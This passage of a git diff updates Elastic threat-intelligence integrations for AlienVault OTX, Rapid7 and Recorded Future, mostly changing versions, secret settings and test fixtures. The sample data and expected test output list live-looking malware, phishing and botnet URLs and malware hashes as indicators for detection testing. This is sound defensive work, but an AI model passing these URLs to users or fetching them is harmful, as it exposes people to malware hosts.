"@timestamp": "2023-08-08T05:05:15.000Z", "agent": { - "ephemeral_id": "613b36ba-6bb7-4e3d-9a90-b5e6ec5a860c", - "id": "8130bdff-3530-4540-8c03-ba091c47a24f", + "ephemeral_id": "98babf94-9cf4-45af-aef8-2d57d61d9876", + "id": "f29e7d89-991e-4f0a-838f-9c2eb93d876e", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.11.0" + "version": "8.12.1" }, "data_stream": { "dataset": "ti_otx.pulses_subscribed", @@ -16,9 +16,9 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "8130bdff-3530-4540-8c03-ba091c47a24f", + "id": "f29e7d89-991e-4f0a-838f-9c2eb93d876e", "snapshot": false, - "version": "8.11.0" + "version": "8.12.1" }, "event": { "agent_id_status": "verified", @@ -26,7 +26,7 @@ "threat" ], "dataset": "ti_otx.pulses_subscribed", - "ingested": "2023-12-22T11:25:24Z", + "ingested": "2024-03-08T02:54:50Z", "kind": "enrichment", "original": "{\"content\":\"\",\"count\":2,\"created\":\"2023-08-08T05:05:15\",\"description\":\"\",\"expiration\":null,\"id\":3454375108,\"indicator\":\"pinup-casino-tr.site\",\"is_active\":1,\"prefetch_pulse_ids\":false,\"pulse_raw\":\"{\\\"adversary\\\":\\\"\\\",\\\"attack_ids\\\":[\\\"T1531\\\",\\\"T1059\\\",\\\"T1566\\\"],\\\"author_name\\\":\\\"SampleUser\\\",\\\"created\\\":\\\"2023-08-22T09:43:18.855000\\\",\\\"description\\\":\\\"\\\",\\\"extract_source\\\":[],\\\"id\\\":\\\"64e38336d783f91d6948a7b1\\\",\\\"industries\\\":[],\\\"malware_families\\\":[\\\"WHIRLPOOL\\\"],\\\"modified\\\":\\\"2023-08-22T09:43:18.855000\\\",\\\"more_indicators\\\":false,\\\"name\\\":\\\"Sample Pulse\\\",\\\"public\\\":1,\\\"references\\\":[\\\"https://www.cisa.gov/news-events/analysis-reports/ar23-230a\\\"],\\\"revision\\\":1,\\\"tags\\\":[\\\"cisa\\\",\\\"backdoor\\\",\\\"whirlpool\\\",\\\"malware\\\"],\\\"targeted_countries\\\":[],\\\"tlp\\\":\\\"white\\\"}\",\"role\":null,\"t\":0,\"t2\":0.0050694942474365234,\"t3\":2.7960586547851562,\"title\":\"\",\"type\":\"domain\"}", "type": [ @@ -40,7 +40,7 @@ "count": 2, "created": "2023-08-08T05:05:15.000Z", "expiration": "2023-08-13T05:05:15.000Z", - "id": 3454375108, + "id": "3454375108", "is_active": 1, "prefetch_pulse_ids": false, "pulse": { diff --git a/packages/ti_otx/data_stream/threat/manifest.yml b/packages/ti_otx/data_stream/threat/manifest.yml index 446e944cb93..23662d53ef4 100644 --- a/packages/ti_otx/data_stream/threat/manifest.yml +++ b/packages/ti_otx/data_stream/threat/manifest.yml @@ -42,12 +42,13 @@ streams: show_user: true default: 5m - name: api_token - type: text + type: password title: API Token multi: false required: true show_user: true description: The Alienvault OTX API token + secret: true - name: first_interval type: text title: First Interval diff --git a/packages/ti_otx/data_stream/threat/sample_event.json b/packages/ti_otx/data_stream/threat/sample_event.json index 08c2f8c6cbb..568c834280a 100644 --- a/packages/ti_otx/data_stream/threat/sample_event.json +++ b/packages/ti_otx/data_stream/threat/sample_event.json @@ -1,11 +1,11 @@ { - "@timestamp": "2023-09-26T06:02:18.318Z", + "@timestamp": "2024-03-08T02:55:33.690Z", "agent": { - "ephemeral_id": "7e240822-d6d7-44de-a74b-02c744232f29", - "id": "ce0bce5a-6e51-4f74-abca-79147f80e169", + "ephemeral_id": "8edc1f21-05cd-4fa5-aadc-66e64f44856a", + "id": "f29e7d89-991e-4f0a-838f-9c2eb93d876e", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.11.0" + "version": "8.12.1" }, "data_stream": { "dataset": "ti_otx.threat", @@ -16,18 +16,18 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "ce0bce5a-6e51-4f74-abca-79147f80e169", - "snapshot": true, - "version": "8.11.0" + "id": "f29e7d89-991e-4f0a-838f-9c2eb93d876e", + "snapshot": false, + "version": "8.12.1" }, "event": { "agent_id_status": "verified", "category": [ "threat" ], - "created": "2023-09-26T06:02:18.318Z", + "created": "2024-03-08T02:55:33.690Z", "dataset": "ti_otx.threat", - "ingested": "2023-09-26T06:02:21Z", + "ingested": "2024-03-08T02:55:45Z", "kind": "enrichment", "original": "{\"count\":40359,\"next\":\"https://otx.alienvault.com/api/v1/indicators/export?types=domain%2CIPv4%2Chostname%2Curl%2CFileHash-SHA256\\u0026modified_since=2020-11-29T01%3A10%3A00+00%3A00\\u0026page=2\",\"previous\":null,\"results\":{\"content\":\"\",\"description\":null,\"id\":1251,\"indicator\":\"info.3000uc.com\",\"title\":null,\"type\":\"hostname\"}}", "type": [ @@ -51,4 +51,4 @@ } } } -} +} \ No newline at end of file diff --git a/packages/ti_otx/docs/README.md b/packages/ti_otx/docs/README.md index 12ac13d1d16..d4989dc3553 100644 --- a/packages/ti_otx/docs/README.md +++ b/packages/ti_otx/docs/README.md @@ -102,13 +102,13 @@ An example event for `threat` looks as following: ```json { - "@timestamp": "2023-09-26T06:02:18.318Z", + "@timestamp": "2024-03-08T02:55:33.690Z", "agent": { - "ephemeral_id": "7e240822-d6d7-44de-a74b-02c744232f29", - "id": "ce0bce5a-6e51-4f74-abca-79147f80e169", + "ephemeral_id": "8edc1f21-05cd-4fa5-aadc-66e64f44856a", + "id": "f29e7d89-991e-4f0a-838f-9c2eb93d876e", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.11.0" + "version": "8.12.1" }, "data_stream": { "dataset": "ti_otx.threat", @@ -119,18 +119,18 @@ An example event for `threat` looks as following: "version": "8.11.0" }, "elastic_agent": { - "id": "ce0bce5a-6e51-4f74-abca-79147f80e169", - "snapshot": true, - "version": "8.11.0" + "id": "f29e7d89-991e-4f0a-838f-9c2eb93d876e", + "snapshot": false, + "version": "8.12.1" }, "event": { "agent_id_status": "verified", "category": [ "threat" ], - "created": "2023-09-26T06:02:18.318Z", + "created": "2024-03-08T02:55:33.690Z", "dataset": "ti_otx.threat", - "ingested": "2023-09-26T06:02:21Z", + "ingested": "2024-03-08T02:55:45Z", "kind": "enrichment", "original": "{\"count\":40359,\"next\":\"https://otx.alienvault.com/api/v1/indicators/export?types=domain%2CIPv4%2Chostname%2Curl%2CFileHash-SHA256\\u0026modified_since=2020-11-29T01%3A10%3A00+00%3A00\\u0026page=2\",\"previous\":null,\"results\":{\"content\":\"\",\"description\":null,\"id\":1251,\"indicator\":\"info.3000uc.com\",\"title\":null,\"type\":\"hostname\"}}", "type": [ @@ -155,7 +155,6 @@ An example event for `threat` looks as following: } } } - ``` ### Pulses Subscribed (Recommended) @@ -233,7 +232,7 @@ The following subscriptions are included by this API: | otx.created | | date | | otx.description | | keyword | | otx.expiration | | date | -| otx.id | The ID of the indicator. | long | +| otx.id | The ID of the indicator. | keyword | | otx.indicator | | keyword | | otx.is_active | | integer | | otx.prefetch_pulse_ids | | boolean | @@ -291,11 +290,11 @@ An example event for `pulses_subscribed` looks as following: { "@timestamp": "2023-08-08T05:05:15.000Z", "agent": { - "ephemeral_id": "613b36ba-6bb7-4e3d-9a90-b5e6ec5a860c", - "id": "8130bdff-3530-4540-8c03-ba091c47a24f", + "ephemeral_id": "98babf94-9cf4-45af-aef8-2d57d61d9876", + "id": "f29e7d89-991e-4f0a-838f-9c2eb93d876e", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.11.0" + "version": "8.12.1" }, "data_stream": { "dataset": "ti_otx.pulses_subscribed", @@ -306,9 +305,9 @@ An example event for `pulses_subscribed` looks as following: "version": "8.11.0" }, "elastic_agent": { - "id": "8130bdff-3530-4540-8c03-ba091c47a24f", + "id": "f29e7d89-991e-4f0a-838f-9c2eb93d876e", "snapshot": false, - "version": "8.11.0" + "version": "8.12.1" }, "event": { "agent_id_status": "verified", @@ -316,7 +315,7 @@ An example event for `pulses_subscribed` looks as following: "threat" ], "dataset": "ti_otx.pulses_subscribed", - "ingested": "2023-12-22T11:25:24Z", + "ingested": "2024-03-08T02:54:50Z", "kind": "enrichment", "original": "{\"content\":\"\",\"count\":2,\"created\":\"2023-08-08T05:05:15\",\"description\":\"\",\"expiration\":null,\"id\":3454375108,\"indicator\":\"pinup-casino-tr.site\",\"is_active\":1,\"prefetch_pulse_ids\":false,\"pulse_raw\":\"{\\\"adversary\\\":\\\"\\\",\\\"attack_ids\\\":[\\\"T1531\\\",\\\"T1059\\\",\\\"T1566\\\"],\\\"author_name\\\":\\\"SampleUser\\\",\\\"created\\\":\\\"2023-08-22T09:43:18.855000\\\",\\\"description\\\":\\\"\\\",\\\"extract_source\\\":[],\\\"id\\\":\\\"64e38336d783f91d6948a7b1\\\",\\\"industries\\\":[],\\\"malware_families\\\":[\\\"WHIRLPOOL\\\"],\\\"modified\\\":\\\"2023-08-22T09:43:18.855000\\\",\\\"more_indicators\\\":false,\\\"name\\\":\\\"Sample Pulse\\\",\\\"public\\\":1,\\\"references\\\":[\\\"https://www.cisa.gov/news-events/analysis-reports/ar23-230a\\\"],\\\"revision\\\":1,\\\"tags\\\":[\\\"cisa\\\",\\\"backdoor\\\",\\\"whirlpool\\\",\\\"malware\\\"],\\\"targeted_countries\\\":[],\\\"tlp\\\":\\\"white\\\"}\",\"role\":null,\"t\":0,\"t2\":0.0050694942474365234,\"t3\":2.7960586547851562,\"title\":\"\",\"type\":\"domain\"}", "type": [ @@ -330,7 +329,7 @@ An example event for `pulses_subscribed` looks as following: "count": 2, "created": "2023-08-08T05:05:15.000Z", "expiration": "2023-08-13T05:05:15.000Z", - "id": 3454375108, + "id": "3454375108", "is_active": 1, "prefetch_pulse_ids": false, "pulse": { diff --git a/packages/ti_otx/elasticsearch/transform/latest_ioc/fields/fields.yml b/packages/ti_otx/elasticsearch/transform/latest_ioc/fields/fields.yml index a113d8baba5..f39d7ddc81e 100644 --- a/packages/ti_otx/elasticsearch/transform/latest_ioc/fields/fields.yml +++ b/packages/ti_otx/elasticsearch/transform/latest_ioc/fields/fields.yml @@ -161,7 +161,7 @@ fields: - name: id - type: long + type: keyword description: > The ID of the indicator. diff --git a/packages/ti_otx/manifest.yml b/packages/ti_otx/manifest.yml index b35f5f27c90..1364cc0a303 100644 --- a/packages/ti_otx/manifest.yml +++ b/packages/ti_otx/manifest.yml @@ -1,13 +1,13 @@ name: ti_otx title: AlienVault OTX -version: "1.23.2" +version: "1.24.1" description: Ingest threat intelligence indicators from AlienVault Open Threat Exchange (OTX) with Elastic Agent. type: integration -format_version: "3.0.0" +format_version: "3.0.2" categories: ["security", "threat_intel"] conditions: kibana: - version: ^8.10.3 + version: ^8.12.0 icons: - src: /img/otx.svg title: Alienvault OTX diff --git a/packages/ti_rapid7_threat_command/changelog.yml b/packages/ti_rapid7_threat_command/changelog.yml index effb59f02a3..3ea56097fbe 100644 --- a/packages/ti_rapid7_threat_command/changelog.yml +++ b/packages/ti_rapid7_threat_command/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.15.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9129 - version: "1.14.1" changes: - description: Changed owners diff --git a/packages/ti_rapid7_threat_command/manifest.yml b/packages/ti_rapid7_threat_command/manifest.yml index d96ae57b8ad..df50c083339 100644 --- a/packages/ti_rapid7_threat_command/manifest.yml +++ b/packages/ti_rapid7_threat_command/manifest.yml @@ -1,14 +1,14 @@ -format_version: 3.0.0 +format_version: 3.0.2 name: ti_rapid7_threat_command title: Rapid7 Threat Command # The version must be updated manually in the transform.yml files and transform APIs mentioned in README. -version: "1.14.1" +version: "1.15.0" description: Collect threat intelligence from Threat Command API with Elastic Agent. type: integration categories: ["security", "threat_intel"] conditions: kibana: - version: ^8.7.1 + version: ^8.12.0 elastic: capabilities: - security @@ -96,6 +96,7 @@ policy_templates: multi: false required: true show_user: true + secret: true - name: proxy_url type: text title: Proxy URL diff --git a/packages/ti_recordedfuture/_dev/deploy/docker/sample_logs/rf_file_default.csv b/packages/ti_recordedfuture/_dev/deploy/docker/sample_logs/rf_file_default.csv new file mode 100644 index 00000000000..9af0c24dcb0 --- /dev/null +++ b/packages/ti_recordedfuture/_dev/deploy/docker/sample_logs/rf_file_default.csv @@ -0,0 +1,3 @@ +"Name","Algorithm","Risk","RiskString","EvidenceDetails" +"63212aa8c94098a844945ed1611389b2e1c9dc3906a5ba9d7d0d320344213f4f","SHA-256","75","2/17","{""EvidenceDetails"": [{""Name"": ""linkedToMalware"", ""EvidenceString"": ""2 sightings on 1 source: PolySwarm. Most recent link (Mar 23, 2024): https://polyswarm.network/scan/results/file/63212aa8c94098a844945ed1611389b2e1c9dc3906a5ba9d7d0d320344213f4f"", ""CriticalityLabel"": ""Suspicious"", ""MitigationString"": """", ""Rule"": ""Linked to Malware"", ""SourcesCount"": 1.0, ""Sources"": [""source:doLlw5""], ""Timestamp"": ""2024-03-23T17:10:20.642Z"", ""SightingsCount"": 2.0, ""Criticality"": 2.0}, {""Name"": ""positiveMalwareVerdict"", ""EvidenceString"": ""3 sightings on 3 sources: Polyswarm Sandbox Analysis, Recorded Future Triage Malware Analysis, PolySwarm. Most recent link (Mar 23, 2024): https://polyswarm.network/scan/results/file/63212aa8c94098a844945ed1611389b2e1c9dc3906a5ba9d7d0d320344213f4f"", ""CriticalityLabel"": ""Malicious"", ""MitigationString"": """", ""Rule"": ""Positive Malware Verdict"", ""SourcesCount"": 3.0, ""Sources"": [""source:hzRhwZ"", ""source:ndy5_2"", ""source:doLlw5""], ""Timestamp"": ""2024-03-23T16:36:02.000Z"", ""SightingsCount"": 3.0, ""Criticality"": 3.0}]}" +"ea0e23a30aa252e4c8a7a8cb92ac2bba1ffcb4e94027bca555798b2920f9bfab","SHA-256","75","2/17","{""EvidenceDetails"": [{""Name"": ""linkedToMalware"", ""EvidenceString"": ""10 sightings on 1 source: PolySwarm. Most recent link (Mar 24, 2024): https://polyswarm.network/scan/results/file/ea0e23a30aa252e4c8a7a8cb92ac2bba1ffcb4e94027bca555798b2920f9bfab"", ""CriticalityLabel"": ""Suspicious"", ""MitigationString"": """", ""Rule"": ""Linked to Malware"", ""SourcesCount"": 1.0, ""Sources"": [""source:doLlw5""], ""Timestamp"": ""2024-03-24T21:22:00.282Z"", ""SightingsCount"": 10.0, ""Criticality"": 2.0}, {""Name"": ""positiveMalwareVerdict"", ""EvidenceString"": ""31 sightings on 3 sources: Recorded Future Sandbox, Polyswarm Sandbox Analysis, PolySwarm. Malware sandbox report for ea0e23a30aa252e4c8a7a8cb92ac2bba1ffcb4e94027bca555798b2920f9bfab on March 27, 2024. Score: 10 (Known bad). Detections: njRAT. Contains: 6 ATT\\u0026CK behaviors, 1 command and control indicator, and 12 signatures. Most recent link (Mar 24, 2024): https://polyswarm.network/scan/results/file/ea0e23a30aa252e4c8a7a8cb92ac2bba1ffcb4e94027bca555798b2920f9bfab"", ""CriticalityLabel"": ""Malicious"", ""MitigationString"": """", ""Rule"": ""Positive Malware Verdict"", ""SourcesCount"": 3.0, ""Sources"": [""source:oWAWVb"", ""source:hzRhwZ"", ""source:doLlw5""], ""Timestamp"": ""2024-03-24T20:33:10.000Z"", ""SightingsCount"": 31.0, ""Criticality"": 3.0}]}" diff --git a/packages/ti_recordedfuture/_dev/deploy/docker/sample_logs/rf_url_default.csv b/packages/ti_recordedfuture/_dev/deploy/docker/sample_logs/rf_url_default.csv index 1327a0d94f1..19e58d712e6 100644 --- a/packages/ti_recordedfuture/_dev/deploy/docker/sample_logs/rf_url_default.csv +++ b/packages/ti_recordedfuture/_dev/deploy/docker/sample_logs/rf_url_default.csv @@ -8,3 +8,4 @@ "https://www.jeanninecatddns.chickenkiller.com/signin-authflow","75","3/24","{""EvidenceDetails"": [{""Rule"": ""Recently Active URL on Weaponized Domain"", ""CriticalityLabel"": ""Malicious"", ""EvidenceString"": ""1 sighting on 1 source: Recorded Future Domain Analysis URLs. Service provider: Afraid.org. Behavior observed: Malware Distribution, Phishing Techniques. Last observed on Dec 28, 2021."", ""Sources"": [""report:aRJ1CU""], ""Timestamp"": ""2021-12-28T22:15:49.631Z"", ""Name"": ""recentWeaponizedURL"", ""MitigationString"": """", ""Criticality"": 3.0}, {""Rule"": ""Recently Detected Phishing Techniques"", ""CriticalityLabel"": ""Malicious"", ""EvidenceString"": ""2 sightings on 2 sources: Bitdefender, Urlscan.io. Detected malicious behavior from an endpoint agent via global telemetry. Last observed on Dec 28, 2021."", ""Sources"": [""d3Awkm"", ""eKv4Jm""], ""Timestamp"": ""2021-12-28T00:00:00.000Z"", ""Name"": ""recentPhishingSiteDetected"", ""MitigationString"": """", ""Criticality"": 3.0}, {""Rule"": ""Recently Detected Malware Distribution"", ""CriticalityLabel"": ""Malicious"", ""EvidenceString"": ""1 sighting on 1 source: Bitdefender. Detected malicious behavior from an endpoint agent via global telemetry. Last observed on Dec 28, 2021."", ""Sources"": [""d3Awkm""], ""Timestamp"": ""2021-12-28T00:00:00.000Z"", ""Name"": ""recentMalwareSiteDetected"", ""MitigationString"": """", ""Criticality"": 3.0}]}" "http://coollab.jp/dir/root/p/09908.js","75","3/24","{""EvidenceDetails"": [{""Rule"": ""Historically Reported as a Defanged URL"", ""CriticalityLabel"": ""Unusual"", ""EvidenceString"": ""24 sightings on 9 sources including: Malware News - Malware Analysis, News and Indicators, microsoft.com, sociabble.com, 4-traders.com, MarketScreener.com | Stock Market News. Most recent link (Aug 13, 2021): https://www.marketscreener.com/quote/stock/MICROSOFT-CORPORATION-4835/news/Microsoft-Attackers-use-Morse-code-other-encryption-methods-in-evasive-phishing-campaign-36161110/?utm_medium=RSS&utm_content=20210813"", ""Sources"": [""gBDK5G"", ""idn:microsoft.com"", ""idn:sociabble.com"", ""KBTQ2e"", ""dCotni"", ""g9rk5F"", ""Z7kln5"", ""idn:cda.ms"", ""idn:thewindowsupdate.com""], ""Timestamp"": ""2021-08-13T17:03:19.000Z"", ""Name"": ""defangedURL"", ""MitigationString"": """", ""Criticality"": 1.0}, {""Rule"": ""Historically Detected Malware Distribution"", ""CriticalityLabel"": ""Unusual"", ""EvidenceString"": ""1 sighting on 1 source: Bitdefender. Detected malicious behavior from an endpoint agent via global telemetry. Last observed on Aug 13, 2021."", ""Sources"": [""d3Awkm""], ""Timestamp"": ""2021-08-13T00:00:00.000Z"", ""Name"": ""malwareSiteDetected"", ""MitigationString"": """", ""Criticality"": 1.0}, {""Rule"": ""Recently Reported by Insikt Group"", ""CriticalityLabel"": ""Malicious"", ""EvidenceString"": ""1 sighting on 1 source: Insikt Group. 1 report: Microsoft Warns of Attacks Targeting Microsoft Office 365 Users. Most recent link (Aug 12, 2021): https://app.recordedfuture.com/live/sc/4BBhpn1ApBQR"", ""Sources"": [""VKz42X""], ""Timestamp"": ""2021-08-12T00:00:00.000Z"", ""Name"": ""recentAnalystNote"", ""MitigationString"": """", ""Criticality"": 3.0}]}" "https://blog.br0vvnn.io","75","3/24","{""EvidenceDetails"": [{""Rule"": ""Historically Reported as a Defanged URL"", ""CriticalityLabel"": ""Unusual"", ""EvidenceString"": ""23 sightings on 9 sources including: The Official Google Blog, eccouncil.org, frsecure.com, SoyaCincau, PasteBin. Most recent tweet: Actor controlled sites and accounts Research Blog https://blog.br0vvnn[.]io. Most recent link (Jan 27, 2021): https://twitter.com/techn0m4nc3r/statuses/1354296736357953539"", ""Sources"": [""Gzt"", ""idn:eccouncil.org"", ""idn:frsecure.com"", ""J-8-Nr"", ""Jv_xrR"", ""g9rk5F"", ""cUg0pv"", ""K5LKj8"", ""fVAueu""], ""Timestamp"": ""2021-01-27T05:14:38.000Z"", ""Name"": ""defangedURL"", ""MitigationString"": """", ""Criticality"": 1.0}, {""Rule"": ""Historically Detected Phishing Techniques"", ""CriticalityLabel"": ""Unusual"", ""EvidenceString"": ""1 sighting on 1 source: Bitdefender. Detected malicious behavior from an endpoint agent via global telemetry. Last observed on May 30, 2021."", ""Sources"": [""d3Awkm""], ""Timestamp"": ""2021-05-30T00:00:00.000Z"", ""Name"": ""phishingSiteDetected"", ""MitigationString"": """", ""Criticality"": 1.0}, {""Rule"": ""Recently Reported by Insikt Group"", ""CriticalityLabel"": ""Malicious"", ""EvidenceString"": ""1 sighting on 1 source: Insikt Group. 1 report: Google Warns of Ongoing Attacks Targeting Security Researchers. Most recent link (Jan 25, 2021): https://app.recordedfuture.com/live/sc/5QCqZ2ZH4lwc"", ""Sources"": [""VKz42X""], ""Timestamp"": ""2021-01-25T00:00:00.000Z"", ""Name"": ""recentAnalystNote"", ""MitigationString"": """", ""Criticality"": 3.0}]}" +"http://cleaning.homesecuritypc.com/packages/fduphhq_bzaeudor.bmp","66","3/35","{""EvidenceDetails"":""{""EvidenceDetails"": [{""Name"": ""malwareSiteDetected"", ""EvidenceString"": ""9 sightings on 1 source: External Sensor Data Analysis. http://cleaning.homesecuritypc.com/packages/fduphhq_bzaeudor.bmp is observed to be a malware site URL that navigates to malicious content including executables, drive-by infection sites, malicious scripts, viruses, trojans, or code."", ""CriticalityLabel"": ""Unusual"", ""MitigationString"": """", ""Rule"": ""Historically Detected Malware Distribution"", ""SourcesCount"": 1.0, ""Sources"": [""source:kBB1fk""], ""Timestamp"": ""2022-07-20T20:40:11.605Z"", ""SightingsCount"": 9.0, ""Criticality"": 1.0}, {""Name"": ""botnetUrl"", ""EvidenceString"": ""8 sightings on 1 source: External Sensor Data Analysis. http://cleaning.homesecuritypc.com/packages/fduphhq_bzaeudor.bmp is observed to be a botnet URL from which network attacks are launched. Attacks may include SPAM messages, DOS, SQL injections, proxy jacking, and other unsolicited contacts."", ""CriticalityLabel"": ""Unusual"", ""MitigationString"": """", ""Rule"": ""Historically Reported Botnet URL"", ""SourcesCount"": 1.0, ""Sources"": [""source:kBB1fk""], ""Timestamp"": ""2022-07-20T20:40:11.605Z"", ""SightingsCount"": 8.0, ""Criticality"": 1.0}, {""Name"": ""recentWeaponizedURL"", ""EvidenceString"": ""1 sighting on 1 source: Recorded Future Domain Analysis URLs. Service provider: No-IP. Behavior observed: Malware Distribution, Phishing Techniques. Last observed on Jan 12, 2024."", ""CriticalityLabel"": ""Malicious"", ""MitigationString"": """", ""Rule"": ""Recently Active URL on Weaponized Domain"", ""SourcesCount"": 1.0, ""Sources"": [""report:aRJ1CU""], ""Timestamp"": ""2024-03-28T11:46:43.868Z"", ""SightingsCount"": 1.0, ""Criticality"": 3.0}]}" diff --git a/packages/ti_recordedfuture/changelog.yml b/packages/ti_recordedfuture/changelog.yml index 1729c3e8ac2..6c914987ff9 100644 --- a/packages/ti_recordedfuture/changelog.yml +++ b/packages/ti_recordedfuture/changelog.yml @@ -1,4 +1,19 @@ # newer versions go on top +- version: "1.23.0" + changes: + - description: Add dashboards and list field + type: enhancement + link: https://github.com/elastic/integrations/pull/9471 +- version: "1.22.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9129 +- version: "1.21.0" + changes: + - description: Make `threat.indicator.url.full` available for rule detections. + type: enhancement + link: https://github.com/elastic/integrations/pull/9052 - version: "1.20.2" changes: - description: Changed owners diff --git a/packages/ti_recordedfuture/data_stream/threat/_dev/test/pipeline/test-httpjson.log-expected.json b/packages/ti_recordedfuture/data_stream/threat/_dev/test/pipeline/test-httpjson.log-expected.json index 9b1626ad65d..96741d5149f 100644 --- a/packages/ti_recordedfuture/data_stream/threat/_dev/test/pipeline/test-httpjson.log-expected.json +++ b/packages/ti_recordedfuture/data_stream/threat/_dev/test/pipeline/test-httpjson.log-expected.json @@ -4289,6 +4289,7 @@ "type": "url", "url": { "domain": "144.34.179.162", + "full": "http://144.34.179.162/a", "original": "http://144.34.179.162/a", "path": "/a", "scheme": "http" @@ -4404,6 +4405,7 @@ "type": "url", "url": { "domain": "adminsys.serveftp.com", + "full": "http://adminsys.serveftp.com/nensa/fabio/ex/478632215/zer7855/nuns566623", "original": "http://adminsys.serveftp.com/nensa/fabio/ex/478632215/zer7855/nuns566623", "path": "/nensa/fabio/ex/478632215/zer7855/nuns566623", "scheme": "http" @@ -4490,6 +4492,7 @@ "url": { "domain": "3.145.115.94", "extension": "exe", + "full": "http://3.145.115.94/zambo/groenhuyzen.exe", "original": "http://3.145.115.94/zambo/groenhuyzen.exe", "path": "/zambo/groenhuyzen.exe", "scheme": "http" @@ -4575,6 +4578,7 @@ "type": "url", "url": { "domain": "gxbrowser.net", + "full": "http://gxbrowser.net", "original": "http://gxbrowser.net", "path": "", "scheme": "http" @@ -4672,6 +4676,7 @@ "url": { "domain": "881.000webhostapp.com", "extension": "txt", + "full": "https://881.000webhostapp.com/1.txt", "original": "https://881.000webhostapp.com/1.txt", "path": "/1.txt", "scheme": "https" @@ -4777,6 +4782,7 @@ "url": { "domain": "comunicador.duckdns.org", "extension": "php", + "full": "http://comunicador.duckdns.org/catalista/lixo/index.php", "original": "http://comunicador.duckdns.org/catalista/lixo/index.php", "path": "/catalista/lixo/index.php", "scheme": "http" @@ -4859,6 +4865,7 @@ "type": "url", "url": { "domain": "www.jeanninecatddns.chickenkiller.com", + "full": "https://www.jeanninecatddns.chickenkiller.com/signin-authflow", "original": "https://www.jeanninecatddns.chickenkiller.com/signin-authflow", "path": "/signin-authflow", "scheme": "https" @@ -4954,6 +4961,7 @@ "url": { "domain": "coollab.jp", "extension": "js", + "full": "http://coollab.jp/dir/root/p/09908.js", "original": "http://coollab.jp/dir/root/p/09908.js", "path": "/dir/root/p/09908.js", "scheme": "http" @@ -5047,6 +5055,7 @@ "type": "url", "url": { "domain": "blog.br0vvnn.io", + "full": "https://blog.br0vvnn.io", "original": "https://blog.br0vvnn.io", "path": "", "scheme": "https" @@ -5128,6 +5137,7 @@ "type": "url", "url": { "domain": "init.icloud-analysis.com", + "full": "http://init.icloud-analysis.com", "original": "http://init.icloud-analysis.com", "path": "", "scheme": "http" @@ -5201,6 +5211,7 @@ "type": "url", "url": { "domain": "init.icloud-analysis.com", + "full": "http://init.icloud-analysis.com", "original": "http://init.icloud-analysis.com", "path": "", "scheme": "http" diff --git a/packages/ti_recordedfuture/data_stream/threat/_dev/test/pipeline/test-url-default.log-expected.json b/packages/ti_recordedfuture/data_stream/threat/_dev/test/pipeline/test-url-default.log-expected.json index 51a9e19b469..1e1b422745b 100644 --- a/packages/ti_recordedfuture/data_stream/threat/_dev/test/pipeline/test-url-default.log-expected.json +++ b/packages/ti_recordedfuture/data_stream/threat/_dev/test/pipeline/test-url-default.log-expected.json @@ -87,6 +87,7 @@ "type": "url", "url": { "domain": "144.34.179.162", + "full": "http://144.34.179.162/a", "original": "http://144.34.179.162/a", "path": "/a", "scheme": "http" @@ -202,6 +203,7 @@ "type": "url", "url": { "domain": "adminsys.serveftp.com", + "full": "http://adminsys.serveftp.com/nensa/fabio/ex/478632215/zer7855/nuns566623", "original": "http://adminsys.serveftp.com/nensa/fabio/ex/478632215/zer7855/nuns566623", "path": "/nensa/fabio/ex/478632215/zer7855/nuns566623", "scheme": "http" @@ -288,6 +290,7 @@ "url": { "domain": "3.145.115.94", "extension": "exe", + "full": "http://3.145.115.94/zambo/groenhuyzen.exe", "original": "http://3.145.115.94/zambo/groenhuyzen.exe", "path": "/zambo/groenhuyzen.exe", "scheme": "http" @@ -373,6 +376,7 @@ "type": "url", "url": { "domain": "gxbrowser.net", + "full": "http://gxbrowser.net", "original": "http://gxbrowser.net", "path": "", "scheme": "http" @@ -470,6 +474,7 @@ "url": { "domain": "881.000webhostapp.com", "extension": "txt", + "full": "https://881.000webhostapp.com/1.txt", "original": "https://881.000webhostapp.com/1.txt", "path": "/1.txt", "scheme": "https" @@ -575,6 +580,7 @@ "url": { "domain": "comunicador.duckdns.org", "extension": "php", + "full": "http://comunicador.duckdns.org/catalista/lixo/index.php", "original": "http://comunicador.duckdns.org/catalista/lixo/index.php", "path": "/catalista/lixo/index.php", "scheme": "http" @@ -657,6 +663,7 @@ "type": "url", "url": { "domain": "www.jeanninecatddns.chickenkiller.com", + "full": "https://www.jeanninecatddns.chickenkiller.com/signin-authflow", "original": "https://www.jeanninecatddns.chickenkiller.com/signin-authflow", "path": "/signin-authflow", "scheme": "https" @@ -752,6 +759,7 @@ "url": { "domain": "coollab.jp", "extension": "js", + "full": "http://coollab.jp/dir/root/p/09908.js", "original": "http://coollab.jp/dir/root/p/09908.js", "path": "/dir/root/p/09908.js", "scheme": "http" @@ -845,6 +853,7 @@ "type": "url", "url": { "domain": "blog.br0vvnn.io", + "full": "https://blog.br0vvnn.io", "original": "https://blog.br0vvnn.io", "path": "", "scheme": "https" @@ -937,6 +946,7 @@ ], "type": "url", "url": { + "full": "example.net/%e3%83%9d%e3%82%b1%e3%83%a2%e3%83%b3-%e3%82%bb%e3%83%b3%e3%82%bf%e3%83%bc-%e6%a8%aa%e6%b5%9c-%e7%a7%bb%e8%bb%a2-%e3%81%aa%e3%81%9c/%e3%81%b5%e3%82%8b%e3%81%95%e3%81%a8-%e7%b4%8d%e7%a8%8e-%e3%83%88%e3%82%a4%e3%83%ac%e3%83%83%e3%83%88-%e3%83%9a%e3%83%bc%e3%83%91%e3%83%bc-%e9%82%84%e5%85%83-%e7%8e%87/%e6%9c%9d%e6%97%a5-%e6%96%b0%e8%81%9e-be-%e3%83%91%e3%82%ba%e3%83%a", "original": 